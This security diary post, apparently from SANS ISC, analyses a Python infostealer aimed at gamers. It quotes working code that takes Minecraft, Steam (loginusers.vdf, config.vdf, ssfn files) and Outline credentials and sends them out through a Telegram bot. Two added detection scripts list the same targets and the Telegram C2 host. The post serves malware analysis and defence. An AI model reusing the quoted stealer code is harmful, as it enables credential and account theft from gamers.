My next class:
Reverse-Engineering Malware: Advanced Code Analysis | Online | Greenwich Mean Time | Oct 28th - Nov 1st 2024

Python Infostealer Targeting Gamers

Published: 2023-03-01. Last Updated: 2023-03-01 09:15:08 UTC
by Xavier Mertens (Version: 1)
1 comment(s)

There are a lot of “gamers” on the Internet, and they generate a lot of business around games. Many games can be downloaded for free, but they have online shops where players buy options like extra lives, weapons, suits, packages, etc. The business of gaming is therefore very lucrative today[1].

I spotted a malicious Python script that acts as an infostealer focusing on gamers! Based on strings found in the code, the attribution goes to Russia (“????????? ??????” can be translated to "a new connection has been established”).

Today, most Python malicious scripts use Discord as a C2, but this one uses Telegram:

bot = telebot.TeleBot(base64.b64decode("NTk1OTUwNzYxODpBQUhmNzBRcVBYMkNiNHNjSzkyZGJwZnVhTEVaQlNWdkVRWQ==").decode("utf-8"), parse_mode=None)
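A base64-wrapped bot token is exactly the kind of indicator a static scanner can pick up before a script is ever executed. The following is an added example (not part of the original diary or of the sample) that parses a Python script with the standard `ast` module, tries to base64-decode every string literal, and reports anything that has the shape of a Telegram bot token (`<numeric bot id>:<35-character secret>`), along with whether the script imports a Telegram library. The token and script in it are constructed placeholders, not the real values from the sample; only the numeric bot id half of a match is reported so a real secret never ends up in a triage log.

```python
import ast
import base64
import binascii
import re

# Shape of a Telegram bot token: numeric bot id, colon, 35-character secret.
TOKEN_RE = re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{35}\b")

# Constructed, non-functional token used only to build the sample below.
FAKE_TOKEN = "1234567890:AAfakefakefakefakefakefakefakefake0"

# Constructed sample script mimicking the telebot pattern quoted in the diary.
SAMPLE_SCRIPT = (
    "import base64, telebot\n"
    'bot = telebot.TeleBot(base64.b64decode("%s").decode("utf-8"), parse_mode=None)\n'
    'print("hello")\n'
) % base64.b64encode(FAKE_TOKEN.encode()).decode()


def _decode_b64(literal):
    """Return decoded text if literal is valid base64 of printable ASCII, else None."""
    if len(literal) < 16 or len(literal) % 4:
        return None
    try:
        text = base64.b64decode(literal, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def find_bot_tokens(source):
    """Scan Python source for Telegram bot tokens, plain or base64-wrapped.

    Returns a list of (line, kind, bot_id) tuples. Only the numeric bot id is
    reported so the secret half of a real token is never written to a log."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Constant) and isinstance(node.value, str)):
            continue
        literal = node.value
        match = TOKEN_RE.search(literal)
        if match:
            findings.append((node.lineno, "plain", match.group().split(":")[0]))
            continue
        decoded = _decode_b64(literal)
        if decoded:
            match = TOKEN_RE.search(decoded)
            if match:
                findings.append((node.lineno, "base64", match.group().split(":")[0]))
    return findings


def uses_telegram(source):
    """True if the script imports telebot/telegram or references the Bot API host."""
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            names = [alias.name for alias in node.names]
            if isinstance(node, ast.ImportFrom) and node.module:
                names.append(node.module)
            if any(name.split(".")[0] in ("telebot", "telegram") for name in names):
                return True
    return "api.telegram.org" in source


if __name__ == "__main__":
    for line, kind, bot_id in find_bot_tokens(SAMPLE_SCRIPT):
        print(f"line {line}: {kind} Telegram bot token, bot id {bot_id}")
    print("telegram library used:", uses_telegram(SAMPLE_SCRIPT))
```

Walking the AST rather than grepping the raw text means the scanner is not fooled by string concatenation or line continuation, and the base64 pass catches the one-level wrapping used here; a sample that stacks several encodings would need the decode step applied repeatedly.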

The script implements the classic code to steal cookies and credentials from a Chrome installation, but it also searches for resources used by gamers.

First, Chrome data is inspected, and only interesting domains are searched:

target_domain = [
    "minecraft.net", 
    "google.com", 
    "live.com", 
    "apple.com", 
    "twitter.com", 
    "spotify.com", 
    "discord.com", 
    "discord.gg", 
    "blockchain.com", 
    "coinbase.com", 
    "paypal.com", 
    "mojang.com", 
    "steamcommunity.com", 
    "steampowered.com", 
    "origin.com", 
    "ea.com", 
    "ubisoft.com"
]

Then, the script searches for the presence of Minecraft:

if os.path.isdir(apps["Minecraft"]):
    AccountsPath = apps["Minecraft"] + "launcher_accounts_microsoft_store.json"
    with open(AccountsPath, encoding="utf-8", mode="r") as f:
        file = json.load(f)
    try:
        for account in file["accounts"]:
            ms_username = file["accounts"][account]["username"]
            minecraft_username = file["accounts"][account]["minecraftProfile"]["name"]
            for user in send_to_users:
                bot.send_message(user, f"?Minecraft Installed\n?Microsoft: `{ms_username}`\n?Minecraft: `{minecraft_username}`", parse_mode="MARKDOWN")
    except KeyError:
        pass

Steam[2] is a well-known platform for downloading games. The script tries to exfiltrate useful information from a Steam setup:

try:
    steam_reg = winreg.OpenKey(winreg.HKEY_CURRENT_USER, path_steam, 0, access=winreg.KEY_READ)
    steampath = winreg.EnumValue(steam_reg, 2)[1]
    steam_auto_login = (winreg.EnumValue(steam_reg, 8))[1]
    steam_lang = (winreg.EnumValue(steam_reg, 0))[1]
    steam_config = steampath + "/config/config.vdf"
    steam_users = steampath + "/config/loginusers.vdf"
    steam_ssfn = []
    for filename in os.listdir(steampath):
        if "ssfn" in filename:
            steam_ssfn.append(filename)
    steam_installed = True

except FileNotFoundError:
    steam_auto_login = "not installed"
    steam_lang = "undefined"
    steam_installed = False

send_to_users = [1084445274]

for user in send_to_users:
    bot.send_message(user, f"????????? ?????? `{datetime.datetime.now()}`\n?IP: `{stun.get_ip_info()}`\n?Computer Name:  `{socket.gethostname()}`\n??User:  `{os.getlogin()}`\n?OC:  `{platform.platform()}`\n??Steam Login: `{steam_auto_login}`\n?Steam Language: `{steam_lang}`", parse_mode="MARKDOWN")
    if steam_installed == True:
        bot.send_message(user, "=====STEAM FILES=====", parse_mode="MARKDOWN")
        bot.send_document(user, open(steam_config, "r", encoding="utf-8"), caption="steam_config")
        bot.send_document(user, open(steam_users, "r", encoding="utf-8"), caption="steam_users")
        for filename in steam_ssfn:
            with open(f"{steampath}/{filename}", "rb") as file:
                bot.send_document(user, file, caption=f"`{filename}`", parse_mode="MARKDOWN")
                file.close()
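From a detection point of view, the behaviour shown in the Minecraft and Steam blocks above is distinctive: a script interpreter reads launcher account files, Steam's loginusers.vdf/config.vdf and ssfn sentry files, then talks to api.telegram.org. The following is an added example (not part of the original diary) of that correlation logic run over a handful of constructed Sysmon-style events. The event layout, the process names and the file locations (the .minecraft folder, the Steam install directory, the Outline Manager log location) are assumptions for the example; Steam itself reading its own configuration is deliberately included to show it is not flagged.

```python
import fnmatch
from collections import defaultdict

# Interpreters a dropped stealer script would typically run under (assumption).
SCRIPT_HOSTS = {"python.exe", "pythonw.exe", "py.exe"}

# Telegram Bot API endpoint contacted by telebot-based scripts.
C2_HOSTS = {"api.telegram.org"}

# Artifacts the quoted sample reads; globs are lowercase and backslash-separated.
# The Outline location is an assumption (the diary only shows the file name).
SENSITIVE_FILE_GLOBS = [
    "*\\launcher_accounts_microsoft_store.json",  # Minecraft launcher accounts
    "*\\steam\\config\\loginusers.vdf",           # Steam logged-in users
    "*\\steam\\config\\config.vdf",               # Steam client config
    "*\\steam\\ssfn*",                            # Steam sentry files
    "*outline*\\000003.log",                      # Outline Manager log (assumed path)
]

# Constructed events: pid 4120 behaves like the stealer, the others are benign
# or only partially matching.
PY = "C:\\Python311\\python.exe"
EVENTS = [
    {"ts": "2023-03-01T09:00:01", "pid": 4120, "image": PY, "event": "FileRead",
     "target": "C:\\Users\\bob\\AppData\\Roaming\\.minecraft\\launcher_accounts_microsoft_store.json"},
    {"ts": "2023-03-01T09:00:02", "pid": 4120, "image": PY, "event": "FileRead",
     "target": "C:\\Program Files (x86)\\Steam\\config\\loginusers.vdf"},
    {"ts": "2023-03-01T09:00:02", "pid": 4120, "image": PY, "event": "FileRead",
     "target": "C:\\Program Files (x86)\\Steam\\ssfn1234567890123456"},
    {"ts": "2023-03-01T09:00:03", "pid": 4120, "image": PY, "event": "DnsQuery",
     "target": "api.telegram.org"},
    {"ts": "2023-03-01T09:01:00", "pid": 5000, "image": "C:\\Program Files (x86)\\Steam\\steam.exe",
     "event": "FileRead", "target": "C:\\Program Files (x86)\\Steam\\config\\loginusers.vdf"},
    {"ts": "2023-03-01T09:02:00", "pid": 6100, "image": PY, "event": "FileRead",
     "target": "C:\\Users\\bob\\project\\data.csv"},
    {"ts": "2023-03-01T09:03:00", "pid": 7200, "image": PY, "event": "NetworkConnect",
     "target": "api.telegram.org"},
]


def is_sensitive_path(path):
    """Case-insensitive glob match of a file path against the stealer's targets."""
    normalized = path.lower().replace("/", "\\")
    return any(fnmatch.fnmatch(normalized, glob) for glob in SENSITIVE_FILE_GLOBS)


def image_name(image):
    """Basename of a process image path, lowercased."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Correlate sensitive-file reads and Telegram contact per script-host process.

    Returns {pid: {"image", "sensitive_files", "c2_hosts", "severity"}} for every
    interpreter process that triggered at least one rule."""
    per_proc = defaultdict(lambda: {"image": None, "sensitive_files": [], "c2_hosts": []})
    for ev in events:
        if image_name(ev["image"]) not in SCRIPT_HOSTS:
            continue  # only script interpreters are in scope for this rule
        rec = per_proc[ev["pid"]]
        rec["image"] = ev["image"]
        if ev["event"] == "FileRead" and is_sensitive_path(ev["target"]):
            rec["sensitive_files"].append(ev["target"])
        elif ev["event"] in ("DnsQuery", "NetworkConnect") and ev["target"].lower() in C2_HOSTS:
            rec["c2_hosts"].append(ev["target"])

    alerts = {}
    for pid, rec in per_proc.items():
        if rec["sensitive_files"] and rec["c2_hosts"]:
            severity = "high"    # gaming credentials read AND Telegram contacted
        elif rec["sensitive_files"]:
            severity = "medium"  # reads alone: could be a legitimate tool
        elif rec["c2_hosts"]:
            severity = "low"     # Telegram alone: plenty of benign bots exist
        else:
            continue
        alerts[pid] = dict(rec, severity=severity)
    return alerts


if __name__ == "__main__":
    for pid, alert in analyze(EVENTS).items():
        print(pid, alert["severity"], image_name(alert["image"]),
              len(alert["sensitive_files"]), "sensitive reads,", alert["c2_hosts"])
```

Splitting the score this way keeps the rule usable: a Python process that only reaches Telegram, or only touches Steam files, is worth a look but not a page-out, whereas the combination within one process is a strong match for the sample described here.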

The script also searches for an Outline Manager installation and extracts any access key found in its log file:

if os.path.isdir(apps["Outline"]):
    AccountsPath = apps["Outline"] + "000003.log"
    with open(AccountsPath, mode="r") as file:
        for string in file.read().splitlines():
            if "accessKey" in string:
                key = string
    reg = re.compile('[^a-zA-Z0-9"@.,:/?-]')
    key = reg.sub('', key)

    for user in send_to_users:
        bot.send_message(user, f"?Outline (LOG): `{key}`", parse_mode="MARKDOWN")

Nothing brand new in this sample, except that it targets gamers. Money is involved in games (sometimes a lot of it), so gamers are attractive targets for attackers. Stay safe!

[1] https://newzoo.com/insights/articles/the-games-market-in-2022-the-year-in-numbers
[2] https://store.steampowered.com

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant


Comments

Good info. Saw this on a Call of Duty game from Russia. Had to factory reset my gaming machine. Started acting funky cold medina.
